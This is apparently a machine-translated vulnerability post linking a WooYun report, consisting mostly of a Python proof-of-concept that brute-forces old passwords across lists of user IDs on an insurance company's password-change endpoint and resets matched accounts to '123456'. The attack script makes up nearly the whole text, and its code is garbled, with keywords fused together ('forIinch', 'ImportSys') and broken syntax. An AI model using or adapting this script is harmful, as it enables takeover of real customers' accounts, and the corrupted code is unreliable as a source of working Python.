Vulnerability Address:
The Anbang Insurance Group has a logical loophole to traverse User ID Brute force user password to reset user password (script included)
http://www.wooyun.org/bugs/wooyun-2010-0119851
The script POC is as follows:
Key: Logical point, Web request, nested
#!/usr/bin/python
#Coding:utf-8
ImportSys
ImportUrllib
ImportUrllib2
defGet_headers (DT):
headers = {
'Accept':'*/*',
'X-requested-with':'XMLHttpRequest',
'user-agent':'mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/41.0.2272.76 safari/537.36',
'Connection':'keep-alive',
'Content-type':'application/x-www-form-urlencoded',
'Host':'www.ab95569.com',
'Content-length': DT,
'accept-encoding':'gzip, deflate',
'Accept-language':'zh-cn,zh;q=0.8',
'Cookies':'pgv_pvi=9633317888'
}
returnHeaders
defGuess_password (Oldpwd,userid):
forIinchOLDPWD:
forJinchUserid:
params = Urllib.urlencode ({'oldpwd'I'newpwd':'123456','userId': J})
DT = Len (params)
headers = get_headers (DT)
Try:
URL ='http://www.ab95569.com/user/updPwd.htm'
req = Urllib2. Request (Url,params,headers=headers)
Response = Urllib2.urlopen (req,timeout=3)
data = Response.read ()
if'saved successfully'inchData
Print'userid:%s, oldpwd:%s'% (J,i)
exceptException, E:
PrintE
def get_oldpwd (filename1):
Temp1 = []
Files = open (filename1,'r')
for i in Files:
i = I.strip ()
Temp1.append (i)
return Temp1
defGet_userid (filename2):
TEMP2 = []
Files = open (filename2,'R')
forIinchFiles
i = I.strip ()
Temp2.append (i)
returnTemp2
if__name__=="__main__":
Oldpwd = Get_oldpwd ('Password.txt')
UserID = Get_userid ('Userid.txt')
Guess_password (Oldpwd,userid)
A PY script for an Anbang logic loophole blasting password